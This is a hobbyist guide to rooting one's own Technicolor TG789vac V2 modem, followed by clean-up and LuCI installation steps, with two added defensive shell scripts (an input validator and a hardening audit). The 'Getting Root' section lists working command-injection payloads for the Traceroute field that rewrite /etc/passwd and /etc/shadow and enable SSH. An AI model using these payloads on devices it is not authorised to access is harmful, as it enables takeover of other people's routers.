Technicolor TG789vac V2 Root Access

I recently had a MyRepublic NBN connection installed, and was provided with a Technicolor TG789vac V2 VDSL2 modem. It arrived quite locked down: in routed mode it could not deal with the complexity of my network (multiple VLANs), and in bridge mode it bridged the VDSL2 interface to the Wifi connection, but not Ethernet!

Following this page gave me enough background to get root on the device. The netcat trick described didn't work for me, but wiring up a serial port allowed me to get information out of the machine.


Getting Root

Following the example here, navigate to the Traceroute diagnostic page, and enter each of the commands below into the IP address field, executing a traceroute after each command. This exploits a bug in the parser that validates user input from the web form, allowing commands to be run as root on the machine.
:::::::; sed -i '1 s/false/ash/' /etc/passwd ; cat /etc/passwd > /dev/ttyS0
:::::::; sed -i '1 c\root:[your root password hash here]:17078:0:99999:7:::' /etc/shadow ; cat /etc/shadow > /dev/ttyS0
:::::::; sed -i '8 s/0/1/' /etc/config/dropbear; cat /etc/config/dropbear > /dev/ttyS0
:::::::; sed -i '3 s/#//' /etc/inittab; cat /etc/inittab > /dev/ttyS0
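The bug above is the classic shape of a command injection: the field's contents reach a shell, and the validation that should have confined them to an address does not. The following is an added example, not code from the original post or from Technicolor's firmware: a hypothetical POSIX sh wrapper showing what an address validator for such a diagnostic page needs to enforce (strict IPv4 or hostname alphabet, no leading dash so the value cannot become an option, octet range check), and that the target is then passed to traceroute as a single argv element rather than through a shell string. The unsafe variant is kept only for contrast and is never called.

```sh
#!/bin/sh
# Added example (not from the original post): the hardened form of a
# traceroute diagnostic handler beside the pattern that lets ':::::::; ...'
# through. All names here are hypothetical.

# UNSAFE: the target is spliced into a string that a shell re-parses, so a
# ';' or '$(...)' in the field runs as whatever user the web server is.
run_traceroute_unsafe() {
    sh -c "traceroute -n $1"
}

# Accepts a dotted-quad IPv4 literal or an RFC 1123-style hostname, nothing else.
validate_target() {
    t=$1
    case $t in
        '' | *[!A-Za-z0-9.-]* | -* | .* | *. | *..*) return 1 ;;   # alphabet, no option-like or malformed labels
    esac
    [ ${#t} -le 253 ] || return 1
    case $t in
        *[!0-9.]*) return 0 ;;   # hostname form: alphabet and label rules already enforced above
    esac
    # All digits and dots: require exactly four octets, each 0..255.
    oldifs=$IFS; IFS=.; set -- $t; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ "$o" -le 255 ] || return 1
    done
    return 0
}

# SAFE: reject anything the validator does not accept, then hand the value to
# traceroute as one argument. No shell ever re-parses the field contents.
run_traceroute() {
    validate_target "$1" || { echo "rejected target: $1" >&2; return 2; }
    traceroute -n -w 2 -m 15 "$1"
}

# Stand-alone demo: TRACE_TARGET=example.com sh thisfile.sh
if [ -n "$TRACE_TARGET" ]; then
    run_traceroute "$TRACE_TARGET"
fi
```

The two `case` patterns do the real work: the first rejects any character outside the address alphabet (which is what stops `;`, spaces, quotes and `$`), and the second distinguishes a hostname from a dotted quad so the octet check only runs where it applies.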

Cleaning up the machine

There are a number of things you must do to sanitise the machine:

  • Follow the instructions here to disable cwmpd.
  • Remove the MyRtech user (remote root access to the machine).
  • Edit /etc/config/system & change coredump/reboot to 0 (if you don't, and a package you add crashes, you may get caught in a boot-loop and will require the serial port to recover).
  • Edit /etc/dropbear/authorized_keys and remove the TCH_Development key (another remote root access path).
  • Edit /etc/nginx/nginx.conf and change the listen lines so nginx only listens on your local LAN address.
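Once those steps are done it is worth being able to prove they stuck, especially after a firmware reset. The script below is an added example, not part of the original post or of the Technicolor firmware: a POSIX sh audit that checks each clean-up item against a root directory (point AUDIT_ROOT at / on the modem). With AUDIT_ROOT unset it builds two constructed sample trees, one factory-like and one cleaned, and audits both so it can run anywhere. It assumes cwmpd is disabled the OpenWrt way (no /etc/rc.d/S*cwmpd start link) and that the coredump setting lives under `config coredump` / `option reboot` in /etc/config/system; the sample file contents are constructed, not copied from a device.

```sh
#!/bin/sh
# Added example (not from the original post): audits the clean-up items above.
# Usage on the modem:  AUDIT_ROOT=/ sh audit.sh
# Assumptions: cwmpd is an init.d service (disabled = no /etc/rc.d/S*cwmpd link);
# UCI layout 'config coredump' -> 'option reboot'.

# No account with the given name in <root>/etc/passwd.
check_no_user() {
    ! grep -q "^$2:" "$1/etc/passwd"
}

# The 'config coredump' section of /etc/config/system has reboot set to 0.
check_coredump_reboot_off() {
    val=$(sed -n '/^config[[:space:]][[:space:]]*coredump/,/^config[[:space:]]/p' "$1/etc/config/system" \
        | awk '$1 == "option" && $2 == "reboot" { print $3 }' | tr -d "'\"")
    [ "$val" = "0" ]
}

# No authorized key carrying the given marker text (absent file counts as clean).
check_no_authorized_key() {
    [ ! -f "$1/etc/dropbear/authorized_keys" ] || ! grep -q "$2" "$1/etc/dropbear/authorized_keys"
}

# Every nginx listen directive names an address; bare ports and wildcards fail.
check_nginx_listen_bound() {
    ! grep -Eq '^[[:space:]]*listen[[:space:]]+([0-9]+|0\.0\.0\.0:[0-9]+|\*:[0-9]+|\[::\]:[0-9]+)([[:space:]]|;)' \
        "$1/etc/nginx/nginx.conf"
}

# No start link for the service under /etc/rc.d (OpenWrt init.d convention).
check_service_disabled() {
    for link in "$1"/etc/rc.d/S*"$2"*; do
        [ -e "$link" ] && return 1
    done
    return 0
}

# Runs every check against <root>, prints PASS/FAIL per item, returns the failure count.
audit_root() {
    fails=0
    report_check() {
        label=$1; shift
        if "$@"; then echo "PASS $label"; else echo "FAIL $label"; fails=$((fails + 1)); fi
    }
    report_check "cwmpd disabled"              check_service_disabled "$1" cwmpd
    report_check "MyRtech user removed"        check_no_user "$1" MyRtech
    report_check "coredump reboot off"         check_coredump_reboot_off "$1"
    report_check "TCH_Development key removed" check_no_authorized_key "$1" TCH_Development
    report_check "nginx bound to LAN address"  check_nginx_listen_bound "$1"
    return "$fails"
}

# Builds a constructed sample tree ("dirty" = factory-like, "clean" = after the
# steps above) under a temp dir and prints its path. Contents are invented.
make_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/config" "$d/etc/dropbear" "$d/etc/nginx" "$d/etc/rc.d"
    if [ "$1" = dirty ]; then
        printf 'root:x:0:0:root:/root:/bin/ash\nMyRtech:x:0:0:support:/root:/bin/ash\n' > "$d/etc/passwd"
        printf "config system\n\toption hostname 'modem'\n\nconfig coredump\n\toption reboot '1'\n" > "$d/etc/config/system"
        echo 'ssh-rsa AAAAB3CONSTRUCTED TCH_Development' > "$d/etc/dropbear/authorized_keys"
        printf 'server {\n    listen 80;\n    listen [::]:80;\n}\n' > "$d/etc/nginx/nginx.conf"
        : > "$d/etc/rc.d/S90cwmpd"
    else
        printf 'root:x:0:0:root:/root:/bin/ash\n' > "$d/etc/passwd"
        printf "config coredump\n\toption reboot '0'\n\nconfig system\n\toption hostname 'modem'\n" > "$d/etc/config/system"
        echo 'ssh-rsa AAAAB3CONSTRUCTED me@laptop' > "$d/etc/dropbear/authorized_keys"
        printf 'server {\n    listen 192.168.1.1:80;\n}\n' > "$d/etc/nginx/nginx.conf"
    fi
    echo "$d"
}

if [ -n "$AUDIT_ROOT" ]; then
    audit_root "$AUDIT_ROOT"
else
    for state in dirty clean; do
        r=$(make_sample_root "$state")
        echo "== constructed $state sample ($r)"
        audit_root "$r" || true
        rm -rf "$r"
    done
fi
```

The checks are deliberately conservative: a missing coredump section or an nginx `listen` with a bare port both count as failures, since on this device the default is the unsafe state and the audit should only go green once you have explicitly set the safe one.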

Installing other packages

The platform is marked 'brcm63xx-tch' rather than 'brcm63xx'. To install other packages, edit /etc/opkg.conf and add the following:
arch all 1
arch noarch 1
arch brcm63xx 3
arch brcm63xx-tch 10

Installing LUCI

To get the OpenWRT LUCI UI on your system, you will need to build it.

  • Follow the OpenWRT build instructions to grab the Chaos Calmer distribution. You will need to clone the repository from https://github.com/openwrt/chaos_calmer.git.
  • Follow the instructions to add all feeds, then enable the LUCI packages you want. Don't build anything yet.
  • The Technicolor build has a more recent ubus than the OpenWRT distribution. If you don't update it, rpcd will crash, which will result in a Bad Time for you (refer to coredump/reboot above). Edit package/sys/ubus/Makefile and change PKG_VERSION to 2016-07-02, PKG_SOURCE_VERSION to 053be7df871e05478284235732f8b0608089512f, and add '+libblobmsg-json' to the DEPENDS line for Package/ubusd.
  • Build OpenWRT as per the instructions.
  • Copy the packages you want to the machine: scp bin/brcm63xx/packages/luci/*.ipk bin/brcm63xx/packages/base/libuci-lua_*.ipk bin/brcm63xx/packages/base/rpcd_*.ipk bin/brcm63xx/packages/base/uhttpd*.ipk bin/brcm63xx/packages/base/libiwinfo*.ipk root@[machine IP]:/tmp/
  • Install the packages: opkg --force-overwrite install /tmp/*.ipk
  • Edit /etc/config/uhttpd and change the listen port from 80 to 81, as nginx (which hosts the Technicolor UI) is already on port 80.